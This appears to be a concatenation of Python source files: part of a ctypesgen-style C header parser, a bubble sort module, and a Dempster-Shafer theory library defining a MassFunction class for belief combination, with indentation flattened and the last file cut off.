self.all.append(nullmacro)
self.output_order.append(("constant", nullmacro))
# A list of tuples describing macros; saved to be processed after
# everything else has been parsed
self.saved_macros = []
# A set of structs that are already known
self.already_seen_structs = set()
# A dict of structs that have only been seen in opaque form
self.already_seen_opaque_structs = {}
# A set of enums that are already known
self.already_seen_enums = set()
# A dict of enums that have only been seen in opaque form
self.already_seen_opaque_enums = {}
def parse(self):
fd, fname = mkstemp(suffix=".h")
with os.fdopen(fd, "w") as f:
for header in self.options.other_headers:
f.write("#include <%s>\n" % header)
for header in self.headers:
f.write('#include "%s"\n' % os.path.abspath(header))
f.flush()
try:
super(DataCollectingParser, self).parse(fname, self.options.debug_level)
finally:
os.unlink(fname)
for name, params, expr, (filename, lineno) in self.saved_macros:
self.handle_macro(name, params, expr, filename, lineno)
def handle_define_constant(self, name, expr, filename, lineno):
# Called by CParser
# Save to handle later
self.saved_macros.append((name, None, expr, (filename, lineno)))
def handle_define_unparseable(self, name, params, value, filename, lineno):
# Called by CParser
if params:
original_string = "#define %s(%s) %s" % (name, ",".join(params), " ".join(value))
else:
original_string = "#define %s %s" % (name, " ".join(value))
macro = MacroDescription(name, params, None, src=(filename, lineno))
macro.error('Could not parse macro "%s"' % original_string, cls="macro")
macro.original_string = original_string
self.macros.append(macro)
self.all.append(macro)
self.output_order.append(("macro", macro))
def handle_define_macro(self, name, params, expr, filename, lineno):
# Called by CParser
# Save to handle later
self.saved_macros.append((name, params, expr, (filename, lineno)))
def handle_undefine(self, macro, filename, lineno):
# save to handle later to get order correct
self.saved_macros.append(("#undef", None, macro, (filename, lineno)))
def handle_ctypes_typedef(self, name, ctype, filename, lineno):
# Called by CtypesParser
ctype.visit(self)
typedef = TypedefDescription(name, ctype, src=(filename, repr(lineno)))
self.typedefs.append(typedef)
self.all.append(typedef)
self.output_order.append(("typedef", typedef))
def handle_ctypes_new_type(self, ctype, filename, lineno):
# Called by CtypesParser
if isinstance(ctype, CtypesEnum):
self.handle_enum(ctype, filename, lineno)
else:
self.handle_struct(ctype, filename, lineno)
def handle_ctypes_function(
self, name, restype, argtypes, errcheck, variadic, attrib, filename, lineno
):
# Called by CtypesParser
restype.visit(self)
for argtype in argtypes:
argtype.visit(self)
function = FunctionDescription(
name, restype, argtypes, errcheck, variadic, attrib, src=(filename, repr(lineno))
)
self.functions.append(function)
self.all.append(function)
self.output_order.append(("function", function))
def handle_ctypes_variable(self, name, ctype, filename, lineno):
# Called by CtypesParser
ctype.visit(self)
variable = VariableDescription(name, ctype, src=(filename, repr(lineno)))
self.variables.append(variable)
self.all.append(variable)
self.output_order.append(("variable", variable))
def handle_struct(self, ctypestruct, filename, lineno):
# Called from within DataCollectingParser
# When we find an opaque struct, we make a StructDescription for it
# and record it in self.already_seen_opaque_structs. If we later
# find a transparent struct with the same tag, we fill in the
# opaque struct with the information from the transparent struct and
# move the opaque struct to the end of the struct list.
name = "%s %s" % (ctypestruct.variety, ctypestruct.tag)
if name in self.already_seen_structs:
return
if ctypestruct.opaque:
if name not in self.already_seen_opaque_structs:
struct = StructDescription(
ctypestruct.tag,
ctypestruct.attrib,
ctypestruct.variety,
None, # No members
True, # Opaque
ctypestruct,
src=(filename, str(lineno)),
)
self.already_seen_opaque_structs[name] = struct
self.structs.append(struct)
self.all.append(struct)
self.output_order.append(("struct", struct))
else:
for (membername, ctype) in ctypestruct.members:
ctype.visit(self)
if name in self.already_seen_opaque_structs:
# Fill in older version
struct = self.already_seen_opaque_structs[name]
struct.opaque = False
struct.members = ctypestruct.members
struct.ctype = ctypestruct
struct.src = ctypestruct.src
self.output_order.append(("struct-body", struct))
del self.already_seen_opaque_structs[name]
else:
struct = StructDescription(
ctypestruct.tag,
ctypestruct.attrib,
ctypestruct.variety,
ctypestruct.members,
False, # Not opaque
src=(filename, str(lineno)),
ctype=ctypestruct,
)
self.structs.append(struct)
self.all.append(struct)
self.output_order.append(("struct", struct))
self.output_order.append(("struct-body", struct))
self.already_seen_structs.add(name)
def handle_enum(self, ctypeenum, filename, lineno):
# Called from within DataCollectingParser.
# Process for handling opaque enums is the same as process for opaque
# structs. See handle_struct() for more details.
tag = ctypeenum.tag
if tag in self.already_seen_enums:
return
if ctypeenum.opaque:
if tag not in self.already_seen_opaque_enums:
enum = EnumDescription(ctypeenum.tag, None, ctypeenum, src=(filename, str(lineno)))
enum.opaque = True
self.already_seen_opaque_enums[tag] = enum
self.enums.append(enum)
self.all.append(enum)
self.output_order.append(("enum", enum))
else:
if tag in self.already_seen_opaque_enums:
# Fill in older opaque version
enum = self.already_seen_opaque_enums[tag]
enum.opaque = False
enum.ctype = ctypeenum
enum.src = ctypeenum.src
enum.members = ctypeenum.enumerators
del self.already_seen_opaque_enums[tag]
else:
enum = EnumDescription(
ctypeenum.tag,
ctypeenum.enumerators,
src=(filename, str(lineno)),
ctype=ctypeenum,
)
enum.opaque = False
self.enums.append(enum)
self.all.append(enum)
self.output_order.append(("enum", enum))
self.already_seen_enums.add(tag)
for (enumname, expr) in ctypeenum.enumerators:
constant = ConstantDescription(enumname, expr, src=(filename, lineno))
self.constants.append(constant)
self.all.append(constant)
self.output_order.append(("constant", constant))
def handle_macro(self, name, params, expr, filename, lineno):
# Called from within DataCollectingParser
src = (filename, lineno)
if expr is None:
expr = ConstantExpressionNode(True)
constant = ConstantDescription(name, expr, src)
self.constants.append(constant)
self.all.append(constant)
return
expr.visit(self)
if isinstance(expr, CtypesType):
if params:
macro = MacroDescription(name, "", src)
macro.error(
"%s has parameters but evaluates to a type. "
"Ctypesgen does not support it." % macro.casual_name(),
cls="macro",
)
self.macros.append(macro)
self.all.append(macro)
self.output_order.append(("macro", macro))
else:
typedef = TypedefDescription(name, expr, src)
self.typedefs.append(typedef)
self.all.append(typedef)
self.output_order.append(("typedef", typedef))
elif name == "#undef":
undef = UndefDescription(expr, src)
self.all.append(undef)
self.output_order.append(("undef", undef))
else:
macro = MacroDescription(name, params, expr, src)
self.macros.append(macro)
self.all.append(macro)
self.output_order.append(("macro", macro))
# Macros could possibly contain things like __FILE__, __LINE__, etc...
# This could be supported, but it would be a lot of work. It would
# probably also bloat the Preamble considerably.
def handle_error(self, message, filename, lineno):
# Called by CParser
error_message("%s:%d: %s" % (filename, lineno, message), cls="cparser")
def handle_pp_error(self, message):
# Called by PreprocessorParser
error_message("%s: %s" % (self.options.cpp, message), cls="cparser")
def handle_status(self, message):
# Called by CParser
status_message(message)
def visit_struct(self, struct):
self.handle_struct(struct, struct.src[0], struct.src[1])
def visit_enum(self, enum):
self.handle_enum(enum, enum.src[0], enum.src[1])
def data(self):
return DescriptionCollection(
self.constants,
self.typedefs,
self.structs,
self.enums,
self.functions,
self.variables,
self.macros,
self.all,
self.output_order,
)
|
py | b414e46ee2ebcc91c92bfe8524a79ebffe5833a7 | from Swap import _swap
def bubble_sort(unsorted):
"""
Does a bubble sort given a Python list
Expected Complexity: O(n^2) (time) and O(1) (space)
:param unsorted: unsorted Python list to be sorted
"""
for i in range(len(unsorted) - 1):
for j in range(0, len(unsorted) - i - 1):
# bubbles up the largest value through the list
if unsorted[j] > unsorted[j + 1]:
_swap(unsorted, j, j + 1)
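# Illustrative usage sketch (added for clarity, not part of the original module);
# assumes the imported _swap(lst, i, j) exchanges lst[i] and lst[j] in place.
def _demo_bubble_sort():
    data = [5, 1, 4, 2, 8]
    bubble_sort(data)   # sorts in place
    return data         # expected: [1, 2, 4, 5, 8]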
|
py | b414e52841b6eaae7938999079f58c4e4c943493 | """
A framework for performing computations in the Dempster-Shafer theory.
"""
from __future__ import print_function
from itertools import chain, combinations
from functools import partial, reduce
from operator import mul
from math import log, fsum, sqrt, factorial
from random import random, shuffle, uniform
import sys
try:
import numpy
try:
from scipy.stats import chi2
from scipy.optimize import fmin_cobyla
except ImportError:
print('SciPy not found: some features will not work.', file=sys.stderr)
except ImportError:
print('NumPy not found: some features will not work.', file=sys.stderr)
class MassFunction(dict):
"""
A Dempster-Shafer mass function (basic probability assignment) based on a dictionary.
Both normalized and unnormalized mass functions are supported.
The underlying frame of discernment is assumed to be discrete.
Hypotheses and their associated mass values can be added/changed/removed using the standard dictionary methods.
Each hypothesis can be an arbitrary sequence which is automatically converted to a 'frozenset', meaning its elements must be hashable.
"""
def __init__(self, source=None):
"""
Creates a new mass function.
If 'source' is not None, it is used to initialize the mass function.
It can either be a dictionary mapping hypotheses to non-negative mass values
or an iterable containing tuples consisting of a hypothesis and a corresponding mass value.
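Example (illustrative addition, not part of the original docstring):
    MassFunction({'ab': 0.6, 'b': 0.4})   # 0.6 on frozenset({'a', 'b'}), 0.4 on frozenset({'b'})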
"""
if source != None:
if isinstance(source, dict):
source = source.items()
for (h, v) in source:
self[h] += v
@staticmethod
def _convert(hypothesis):
"""Convert hypothesis to a 'frozenset' in order to make it hashable."""
if isinstance(hypothesis, frozenset):
return hypothesis
else:
return frozenset(hypothesis)
@staticmethod
def gbt(likelihoods, normalization=True, sample_count=None):
"""
Constructs a mass function using the generalized Bayesian theorem.
For more information, see Smets. 1993. Belief functions:
The disjunctive rule of combination and the generalized Bayesian theorem. International Journal of Approximate Reasoning.
'likelihoods' specifies the conditional plausibilities for a set of singleton hypotheses.
It can either be a dictionary mapping singleton hypotheses to plausibilities or an iterable
containing tuples consisting of a singleton hypothesis and a corresponding plausibility value.
'normalization' determines whether the resulting mass function is normalized, i.e., whether m({}) == 0.
If 'sample_count' is not None, the true mass function is approximated using the specified number of samples.
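Example (illustrative addition, not part of the original docstring):
    m = MassFunction.gbt({'a': 0.8, 'b': 0.5, 'c': 0.2})
    # each subset's mass is proportional to the product of the plausibilities of its
    # elements and (1 - plausibility) of the excluded elements, normalized over non-empty sets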
"""
m = MassFunction()
if isinstance(likelihoods, dict):
likelihoods = list(likelihoods.items())
# filter trivial likelihoods 0 and 1
ones = [h for (h, l) in likelihoods if l >= 1.0]
likelihoods = [(h, l) for (h, l) in likelihoods if 0.0 < l < 1.0]
if sample_count == None: # deterministic
def traverse(m, likelihoods, ones, index, hyp, mass):
if index == len(likelihoods):
m[hyp + ones] = mass
else:
traverse(m, likelihoods, ones, index + 1, hyp + [likelihoods[index][0]], mass * likelihoods[index][1])
traverse(m, likelihoods, ones, index + 1, hyp, mass * (1.0 - likelihoods[index][1]))
traverse(m, likelihoods, ones, 0, [], 1.0)
if normalization:
m.normalize()
else: # Monte-Carlo
if normalization:
empty_mass = reduce(mul, [1.0 - l[1] for l in likelihoods], 1.0)
for _ in range(sample_count):
rv = [random() for _ in range(len(likelihoods))]
subtree_mass = 1.0
hyp = set(ones)
for k in range(len(likelihoods)):
l = likelihoods[k][1]
p_t = l * subtree_mass
p_f = (1.0 - l) * subtree_mass
if normalization and not hyp: # avoid empty hypotheses in the normalized case
p_f -= empty_mass
if p_t > rv[k] * (p_t + p_f):
hyp.add(likelihoods[k][0])
else:
subtree_mass *= 1 - l # only relevant for the normalized empty case
m[hyp] += 1.0 / sample_count
return m
@staticmethod
def from_bel(bel):
"""
Creates a mass function from a corresponding belief function.
'bel' is a dictionary mapping hypotheses to belief values (like the dictionary returned by 'bel(None)').
"""
m = MassFunction()
for h1 in bel.keys():
v = fsum([bel[h2] * (-1)**(len(h1 - h2)) for h2 in powerset(h1)])
if v > 0:
m[h1] = v
mass_sum = fsum(m.values())
if mass_sum < 1.0:
m[frozenset()] = 1.0 - mass_sum
return m
@staticmethod
def from_pl(pl):
"""
Creates a mass function from a corresponding plausibility function.
'pl' is a dictionary mapping hypotheses to plausibility values (like the dictionary returned by 'pl(None)').
"""
frame = max(pl.keys(), key=len)
bel_theta = pl[frame]
bel = {frozenset(frame - h):bel_theta - v for (h, v) in pl.items()} # follows from bel(-A) = bel(frame) - pl(A)
return MassFunction.from_bel(bel)
@staticmethod
def from_q(q):
"""
Creates a mass function from a corresponding commonality function.
'q' is a dictionary mapping hypotheses to commonality values (like the dictionary returned by 'q(None)').
"""
m = MassFunction()
frame = max(q.keys(), key=len)
for h1 in q.keys():
v = fsum([q[h1 | h2] * (-1)**(len(h2 - h1)) for h2 in powerset(frame - h1)])
if v > 0:
m[h1] = v
mass_sum = fsum(m.values())
if mass_sum < 1.0:
m[frozenset()] = 1.0 - mass_sum
return m
def __missing__(self, key):
"""Return 0 mass for hypotheses that are not contained."""
return 0.0
def __copy__(self):
c = MassFunction()
for k, v in self.items():
c[k] = v
return c
def copy(self):
"""Creates a shallow copy of the mass function."""
return self.__copy__()
def __contains__(self, hypothesis):
return dict.__contains__(self, MassFunction._convert(hypothesis))
def __getitem__(self, hypothesis):
return dict.__getitem__(self, MassFunction._convert(hypothesis))
def __setitem__(self, hypothesis, value):
"""
Adds or updates the mass value of a hypothesis.
'hypothesis' is automatically converted to a 'frozenset' meaning its elements must be hashable.
In case of a negative mass value, a ValueError is raised.
"""
if value < 0.0:
raise ValueError("mass value is negative: %f" % value)
dict.__setitem__(self, MassFunction._convert(hypothesis), value)
def __delitem__(self, hypothesis):
return dict.__delitem__(self, MassFunction._convert(hypothesis))
def frame(self):
"""
Returns the frame of discernment of the mass function as a 'frozenset'.
The frame of discernment is the union of all contained hypotheses.
In case the mass function does not contain any hypotheses, an empty set is returned.
"""
if not self:
return frozenset()
else:
return frozenset.union(*self.keys())
def singletons(self):
"""
Returns the set of all singleton hypotheses.
Like 'frame()', except that each singleton is wrapped in a frozenset
and can thus be directly passed to methods like 'bel()'.
"""
return {frozenset((s,)) for s in self.frame()}
def focal(self):
"""
Returns the set of all focal hypotheses.
A focal hypothesis has a mass value greater than 0.
"""
return {h for (h, v) in self.items() if v > 0}
def core(self, *mass_functions):
"""
Returns the core of one or more mass functions as a 'frozenset'.
The core of a single mass function is the union of all its focal hypotheses.
In case a mass function does not contain any focal hypotheses, its core is an empty set.
If multiple mass functions are given, their combined core (intersection of all single cores) is returned.
"""
if mass_functions:
return frozenset.intersection(self.core(), *[m.core() for m in mass_functions])
else:
focal = self.focal()
if not focal:
return frozenset()
else:
return frozenset.union(*focal)
def all(self):
"""Returns an iterator over all subsets of the frame of discernment, including the empty set."""
return powerset(self.frame())
def bel(self, hypothesis=None):
"""
Computes either the belief of 'hypothesis' or the entire belief function (hypothesis=None).
If 'hypothesis' is None (default), a dictionary mapping hypotheses to their respective belief values is returned.
Otherwise, the belief of 'hypothesis' is returned.
In this case, 'hypothesis' is automatically converted to a 'frozenset' meaning its elements must be hashable.
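Example (illustrative addition, not part of the original docstring):
    m = MassFunction({'ab': 0.6, 'b': 0.4})
    m.bel('b')    # 0.4: only the focal set {'b'} is contained in {'b'}
    m.bel('ab')   # 1.0: both focal sets are contained in {'a', 'b'}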
"""
if hypothesis is None:
return {h:self.bel(h) for h in powerset(self.core())}
else:
hypothesis = MassFunction._convert(hypothesis)
if not hypothesis:
return 0.0
else:
return fsum([v for (h, v) in self.items() if h and hypothesis.issuperset(h)])
def pl(self, hypothesis=None):
"""
Computes either the plausibility of 'hypothesis' or the entire plausibility function (hypothesis=None).
If 'hypothesis' is None (default), a dictionary mapping hypotheses to their respective plausibility values is returned.
Otherwise, the plausibility of 'hypothesis' is returned.
In this case, 'hypothesis' is automatically converted to a 'frozenset' meaning its elements must be hashable.
"""
if hypothesis is None:
return {h:self.pl(h) for h in powerset(self.core())}
else:
hypothesis = MassFunction._convert(hypothesis)
if not hypothesis:
return 0.0
else:
return fsum([v for (h, v) in self.items() if hypothesis & h])
def q(self, hypothesis=None):
"""
Computes either the commonality of 'hypothesis' or the entire commonality function (hypothesis=None).
If 'hypothesis' is None (default), a dictionary mapping hypotheses to their respective commonality values is returned.
Otherwise, the commonality of 'hypothesis' is returned.
In this case, 'hypothesis' is automatically converted to a 'frozenset' meaning its elements must be hashable.
"""
if hypothesis is None:
return {h:self.q(h) for h in powerset(self.core())}
else:
if not hypothesis:
return 1.0
else:
return fsum([v for (h, v) in self.items() if h.issuperset(hypothesis)])
def __and__(self, mass_function):
"""Shorthand for 'combine_conjunctive(mass_function)'."""
return self.combine_conjunctive(mass_function)
def __or__(self, mass_function):
"""Shorthand for 'combine_disjunctive(mass_function)'."""
return self.combine_disjunctive(mass_function)
def __str__(self):
hyp = sorted([(v, h) for (h, v) in self.items()], reverse=True)
return "{" + "; ".join([str(set(h)) + ":" + str(v) for (v, h) in hyp]) + "}"
def __mul__(self, scalar):
if not isinstance(scalar, float):
raise TypeError('Can only multiply by a float value.')
m = MassFunction()
for (h, v) in self.items():
m[h] = v * scalar
return m
def __rmul__(self, scalar):
return self.__mul__(scalar)
def __add__(self, m):
if not isinstance(m, MassFunction):
raise TypeError('Can only add two mass functions.')
result = self.copy()
for (h, v) in m.items():
result[h] += v
return result
def weight_function(self):
"""
Computes the weight function corresponding to this mass function.
"""
weights = dict()
q = self.q()
theta = self.frame()
for h in powerset(theta):
if len(h) < len(theta): # weight is undefined for theta
sets = [h | c for c in powerset(theta - h)]
q_even = reduce(mul, [q[h2] for h2 in sets if len(h2) % 2 == 0], 1.0)
q_odd = reduce(mul, [q[h2] for h2 in sets if len(h2) % 2 == 1], 1.0)
if len(h) % 2 == 0:
weights[h] = q_odd / q_even
else:
weights[h] = q_even / q_odd
return weights
def combine_conjunctive(self, mass_function, normalization=True, sample_count=None, importance_sampling=False):
"""
Conjunctively combines the mass function with another mass function and returns the combination as a new mass function.
The other mass function is assumed to be defined over the same frame of discernment.
If 'mass_function' is not of type MassFunction, it is assumed to be an iterable containing multiple mass functions that are iteratively combined.
If the mass functions are flatly contradicting or if one of the mass functions is empty, an empty mass function is returned.
'normalization' determines whether the resulting mass function is normalized (default is True).
If 'sample_count' is not None, the true combination is approximated using the specified number of samples.
In this case, 'importance_sampling' determines the method of approximation (only if normalization=True, otherwise 'importance_sampling' is ignored).
The default method (importance_sampling=False) independently generates samples from both mass functions and computes their intersections.
If importance_sampling=True, importance sampling is used to avoid empty intersections, which leads to a lower approximation error but is also slower.
This method should be used if there is significant evidential conflict between the mass functions.
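Example (illustrative addition, not part of the original docstring):
    m1 = MassFunction({'ab': 0.6, 'bc': 0.4})
    m2 = MassFunction({'a': 0.1, 'b': 0.9})
    m1 & m2   # normalized Dempster combination: {'b'}: 0.9375, {'a'}: 0.0625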
"""
return self._combine(mass_function, rule=lambda s1, s2: s1 & s2, normalization=normalization, sample_count=sample_count, importance_sampling=importance_sampling)
def combine_disjunctive(self, mass_function, sample_count=None):
"""
Disjunctively combines the mass function with another mass function and returns the combination as a new mass function.
The other mass function is assumed to be defined over the same frame of discernment.
If 'mass_function' is not of type MassFunction, it is assumed to be an iterable containing multiple mass functions that are iteratively combined.
If 'sample_count' is not None, the true combination is approximated using the specified number of samples.
"""
return self._combine(mass_function, rule=lambda s1, s2: s1 | s2, normalization=False, sample_count=sample_count, importance_sampling=False)
def combine_cautious(self, mass_function):
"""
Combines the mass function with another mass function using the cautious rule and returns the combination as a new mass function.
For more details, see:
T. Denoeux (2008), "Conjunctive and disjunctive combination of belief functions induced by nondistinct bodies of evidence",
Artificial Intelligence 172, 234-264.
"""
w1 = self.weight_function()
w2 = mass_function.weight_function()
w_min = {h:min(w1[h], w2[h]) for h in w1}
theta = self.frame()
m = MassFunction({theta:1.0})
for h, w in w_min.items():
m_simple = MassFunction({theta:w, h:1.0 - w})
m = m.combine_conjunctive(m_simple, normalization=False)
return m
def combine_conjunctive_disjunctive(self, mass_function, sample_count=None):
"""Dubois-Prade combination; conjunctive for non-conflicting sets, disjunctive otherwise"""
return self._combine(mass_function, rule=lambda s1, s2: s1 | s2 if not (s1 & s2) else s1 & s2, normalization=False, sample_count=sample_count, importance_sampling=False)
def combine_yager(self, mass_function, sample_count=None, importance_sampling=False):
mj = self._combine(mass_function, rule=lambda s1, s2: s1 & s2, normalization=False, sample_count=sample_count, importance_sampling=importance_sampling)
if frozenset() in mj:
mj[mj.frame()] += mj[frozenset()]
del mj[frozenset()]
return mj
def _combine(self, mass_function, rule, normalization, sample_count, importance_sampling):
"""Helper method for combining two or more mass functions."""
combined = self
if isinstance(mass_function, MassFunction):
mass_function = [mass_function] # wrap single mass function
for m in mass_function:
if not isinstance(m, MassFunction):
raise TypeError("expected type MassFunction but got %s; make sure to use keyword arguments for anything other than mass functions" % type(m))
if sample_count == None:
combined = combined._combine_deterministic(m, rule)
else:
if importance_sampling and normalization:
combined = combined._combine_importance_sampling(m, sample_count)
else:
combined = combined._combine_direct_sampling(m, rule, sample_count)
if normalization:
return combined.normalize()
else:
return combined
def _combine_deterministic(self, mass_function, rule):
"""Helper method for deterministically combining two mass functions."""
combined = MassFunction()
for (h1, v1) in self.items():
for (h2, v2) in mass_function.items():
combined[rule(h1, h2)] += v1 * v2
return combined
def _combine_direct_sampling(self, mass_function, rule, sample_count):
"""Helper method for approximatively combining two mass functions using direct sampling."""
combined = MassFunction()
samples1 = self.sample(sample_count)
samples2 = mass_function.sample(sample_count)
for i in range(sample_count):
combined[rule(samples1[i], samples2[i])] += 1.0 / sample_count
return combined
def _combine_importance_sampling(self, mass_function, sample_count):
"""Helper method for approximatively combining two mass functions using importance sampling."""
combined = MassFunction()
for (s1, n) in self.sample(sample_count, as_dict=True).items():
weight = mass_function.pl(s1)
for s2 in mass_function.condition(s1).sample(n):
combined[s2] += weight
return combined
def combine_gbt(self, likelihoods, normalization=True, sample_count=None, importance_sampling=True):
"""
Conjunctively combines the mass function with a mass function obtained from a sequence of
likelihoods via the generalized Bayesian theorem and returns the combination as a new mass function.
Equivalent to 'combine_conjunctive(MassFunction.gbt(likelihoods))'.
By ignoring incompatible likelihoods, it is generally faster than the former
method and yields a better Monte-Carlo approximation in case of normalization.
'likelihoods' specifies the conditional plausibilities for a set of singleton hypotheses.
It can either be a dictionary mapping singleton hypotheses to plausibilities or an iterable
containing tuples consisting of a singleton hypothesis and a corresponding plausibility value.
All arguments except for 'likelihoods' must be specified as keyword arguments.
'normalization' determines whether the resulting mass function is normalized, i.e., whether m({}) == 0.
If 'sample_count' is not None, the true mass function is approximated using the specified number of samples.
See 'combine_conjunctive' for details on the effect of setting 'importance_sampling'.
"""
core = self.core() # restrict to generally compatible likelihoods
if isinstance(likelihoods, dict):
likelihoods = list(likelihoods.items())
likelihoods = [l for l in likelihoods if l[1] > 0 and l[0] in core]
if sample_count == None: # deterministic
return self.combine_conjunctive(MassFunction.gbt(likelihoods), normalization=normalization)
else: # Monte-Carlo
if not normalization: # only use importance sampling in case of normalization
importance_sampling = False
combined = MassFunction()
for s, n in self.sample(sample_count, as_dict=True).items():
if importance_sampling:
compatible_likelihoods = [l for l in likelihoods if l[0] in s]
weight = 1.0 - reduce(mul, [1.0 - l[1] for l in compatible_likelihoods], 1.0)
else:
compatible_likelihoods = likelihoods
if not compatible_likelihoods:
continue
if normalization:
empty_mass = reduce(mul, [1.0 - l[1] for l in compatible_likelihoods], 1.0)
for _ in range(n):
rv = [random() for _ in range(len(compatible_likelihoods))]
subtree_mass = 1.0
hyp = set()
for k in range(len(compatible_likelihoods)):
l = compatible_likelihoods[k][1]
norm = 1.0 if hyp or not normalization else 1.0 - empty_mass / subtree_mass
if l / norm > rv[k]:
hyp.add(compatible_likelihoods[k][0])
else:
subtree_mass *= 1.0 - l # only relevant for negative case
if importance_sampling:
combined[hyp] += weight
else:
combined[hyp & s] += 1.0
if normalization:
return combined.normalize()
else:
return combined
def condition(self, hypothesis, normalization=True):
"""
Conditions the mass function with 'hypothesis'.
'normalization' determines whether the resulting conjunctive combination is normalized (must be specified as a keyword argument).
Shorthand for self.combine_conjunctive(MassFunction({hypothesis:1.0}), normalization).
"""
m = MassFunction({MassFunction._convert(hypothesis):1.0})
return self.combine_conjunctive(m, normalization=normalization)
def conflict(self, mass_function, logval=True, sample_count=None):
"""
Calculates the weight of conflict between two or more mass functions.
If 'mass_function' is not of type MassFunction, it is assumed to be an iterable containing multiple mass functions.
The weight of conflict is computed as the (natural) logarithm of the normalization constant in Dempster's rule of combination; if logval is False, the total conflicting (empty-set) mass of the unnormalized combination is returned instead.
Returns infinity in case the mass functions are flatly contradicting.
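Example (illustrative addition, not part of the original docstring):
    MassFunction({'a': 1.0}).conflict(MassFunction({'b': 1.0}))   # inf (total contradiction)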
"""
# compute full conjunctive combination (could be more efficient)
m = self.combine_conjunctive(mass_function, normalization=False, sample_count=sample_count)
empty = m[frozenset()]
m_sum = fsum(m.values())
diff = m_sum - empty
if diff == 0.0:
return float('inf')
else:
if logval is True:
return -log(diff)
else:
return 1 - diff
def normalize(self):
"""
Normalizes the mass function in-place.
Sets the mass value of the empty set to 0 and scales all other values such that their sum equals 1.
For convenience, the method returns 'self'.
"""
if frozenset() in self:
del self[frozenset()]
mass_sum = fsum(self.values())
if mass_sum != 1.0:
for (h, v) in self.items():
self[h] = v / mass_sum
return self
def discount(self, r):
"""
Discounts the mass function by factor r. The method returns 'self'
"""
mass_omega = self[self.frame()]
for (h, v) in self.items():
self[h] = v * r
self[self.frame()] = 1 - (r * (1-mass_omega))
return self
def prune(self):
"""
Removes all non-focal (0 mass) hypotheses in-place.
For convenience, the method returns 'self'.
"""
remove = [h for (h, v) in self.items() if v == 0.0]
for h in remove:
del self[h]
return self
def markov(self, transition_model, sample_count=None):
"""
Computes the mass function induced by a prior belief (self) and a transition model.
The transition model expresses a joint belief over the frame of this mass function and a new frame.
The belief over the frame of this mass function is implicitly assumed to be vacuous.
The transition model is a function returning the conditional belief over the new frame (as a mass function
if sample_count=None) while taking a singleton hypothesis of the current frame as input.
The disjunctive rule of combination is then used to construct the mass function over the new frame.
If 'sample_count' is not None, the true mass function is approximated using the specified number of samples.
In this case, 'transition_model' is expected to take a second argument stating how many samples from the corresponding conditional mass function should be returned.
The return value in this case is expected to be an iterable over sampled hypotheses from the new frame.
This method can be used to implement the prediction step for estimation in a hidden Markov process (hence the name).
Under this interpretation, the transition model expresses the mass distribution over successor states given the current state.
"""
updated = MassFunction()
if sample_count == None: # deterministic
for k, v in self.items():
predicted = None
for e in k:
if predicted == None:
predicted = transition_model(e)
else:
predicted |= transition_model(e)
for kp, vp in predicted.items():
updated[kp] += v * vp
else: # Monte-Carlo
for s, n in self.sample(sample_count, as_dict=True).items():
unions = [[] for _ in range(n)]
for e in s:
ts = transition_model(e, n)
for i, t in enumerate(ts):
unions[i].extend(t)
for u in unions:
updated[u] += 1.0 / sample_count
return updated
def map(self, function):
"""
Maps each hypothesis to a new hypothesis using 'function' and returns the new mass function.
'function' is a function taking a hypothesis as its only input and returning a new hypothesis
(i.e., a sequence that can be converted to a 'frozenset').
Here are some example use cases:
1. Vacuous extension to a multi-dimensional frame of discernment (m is defined over
the frame A while the new mass function is defined over the Cartesian product AxB):
B = {'x', 'y', 'z'}
m.map(lambda h: itertools.product(h, B))
2. Projection to a lower dimensional frame (m is defined over AxBxC such that each hypothesis is
a set of tuples where each tuple consists of 3 elements; the new mass function is defined over BxC):
m.map(lambda h: (t[1:] for t in h))
"""
m = MassFunction()
for (h, v) in self.items():
m[self._convert(function(h))] += v
return m
def pignistic(self):
"""Computes the pignistic transformation and returns it as a new mass function consisting only of singletons."""
p = MassFunction()
for (h, v) in self.items():
if v > 0.0:
size = float(len(h))
for s in h:
p[(s,)] += v / size
return p.normalize()
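# Illustrative note (added for clarity, not part of the original class): for
# MassFunction({'ab': 0.6, 'b': 0.4}), pignistic() splits the 0.6 on {'a', 'b'}
# evenly, yielding {'a'}: 0.3 and {'b'}: 0.7.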
def local_conflict(self):
"""
Computes the local conflict measure.
For more information, see Pal et al. 1993. Uncertainty measures for evidential reasoning II:
A new measure of total uncertainty. International Journal of Approximate Reasoning.
Only works for normalized mass functions.
If the mass function is unnormalized, the method returns float('nan')
In case the mass function is a probability function (containing only singleton hypotheses),
it reduces to the classical entropy measure.
"""
if self[frozenset()] > 0.0:
return float('nan')
c = 0.0
for (h, v) in self.items():
if v > 0.0:
c += v * log(len(h) / v, 2)
return c
def hartley_measure(self):
"""
Computes the Hartley-like measure in order to quantify the amount of imprecision.
For more information, see:
G. J. Klir (1999), "Uncertainty and information measures for imprecise probabilities: An overview",
International Symposium on Imprecise Probabilities and Their Applications.
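Example (illustrative addition, not part of the original docstring):
    MassFunction({'ab': 1.0}).hartley_measure()   # 1.0 == log2(|{'a', 'b'}|)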
"""
return fsum([v * log(len(h), 2) for h, v in self.items()])
def norm(self, m, p=2):
"""
Computes the p-norm between two mass functions (default is p=2).
Both mass functions are treated as vectors of mass values.
"""
d = fsum([abs(v - m[h])**p for (h, v) in self.items()])
for (h, v) in m.items():
if h not in self:
d += v**p
return d**(1.0 / p)
def distance(self, m):
"""
Computes the Jaccard-based distance between the two mass functions
"""
#need to gather all keys
keys = numpy.array(list(set(self.keys()).union(set(m.keys()))))
ands = keys[:,None] & keys
ors = keys[:,None] | keys
def jac(a, b):
return len(a) / len(b)
vfunc = numpy.vectorize(jac)
jaccard = vfunc(ands, ors)
av = numpy.array( [self[k] for k in keys] )
bv = numpy.array([m[k] for k in keys] )
diff = av - bv
return (numpy.dot(numpy.dot(diff, jaccard), diff)*0.5)**0.5
def is_compatible(self, m):
"""
Checks whether another mass function is compatible with this one.
Compatibility means that the mass value of each hypothesis in 'm' is less than
or equal to the corresponding plausibility given by this mass function.
"""
return all([self.pl(h) >= v for (h, v) in m.items()])
def sample(self, n, quantization=True, as_dict=False):
"""
Returns n random samples from the mass distribution.
Hypotheses are drawn with a probability proportional to their mass values (with replacement).
If 'quantization' is True (default), the method performs a quantization of the mass values.
This means the frequency of a hypothesis h in the sample set is at least int(self[h] * n / t) where t is the sum of all mass values.
The remaining sample slots (if any) are filled up according to the remainders of the fractions computed in the first step.
The parameter 'as_dict' determines the type of the returned value.
If 'as_dict' is False (default), a list of length n is returned.
Otherwise, the result is a dictionary specifying the number of samples for each hypothesis.
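Example (illustrative addition, not part of the original docstring):
    MassFunction({'a': 0.75, 'b': 0.25}).sample(4)
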